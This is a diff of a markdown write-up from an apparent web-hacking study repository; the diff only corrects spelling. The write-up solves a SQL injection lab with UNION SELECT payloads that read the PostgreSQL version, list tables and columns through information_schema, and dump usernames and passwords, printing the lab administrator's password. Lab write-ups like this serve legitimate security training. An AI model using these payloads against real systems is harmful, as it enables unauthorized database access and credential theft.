Trumpiter-max/Web-Hacking-101/Server-Side/sql.md

 Description of this lab: You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

-This lab has 2 available cloumns, we need to determine the name of table first.
+This lab has 2 available columns, we need to determine the name of table first.
 However, determine the version of database.
 After trying, `' UNION SELECT version(), NULL--` worked and result is `PostgreSQL 12.12 (Ubuntu 12.12-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit`

-Check the cheatsheet, found database contents with PostgreSQL using `' UNION SELECT table_name, NULL FROM information_schema.tables--`.
-So there are a lot of tables, find the column of table `' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users_ahngdj'--`, the result is colunms names: username_ivoiag and password_vxgmam
+Check the cheat sheet, found database contents with PostgreSQL using `' UNION SELECT table_name, NULL FROM information_schema.tables--`.
+So there are a lot of tables, find the column of table `' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users_ahngdj'--`, the result is columns names: username_ivoiag and password_vxgmam

 The final payload is `' UNION SELECT username_ivoiag, password_vxgmam FROM users_ahngdj--`, the password of administrator is l9jw2he0g1jr5zzndr3o.
 Login with this password, then solved the lab.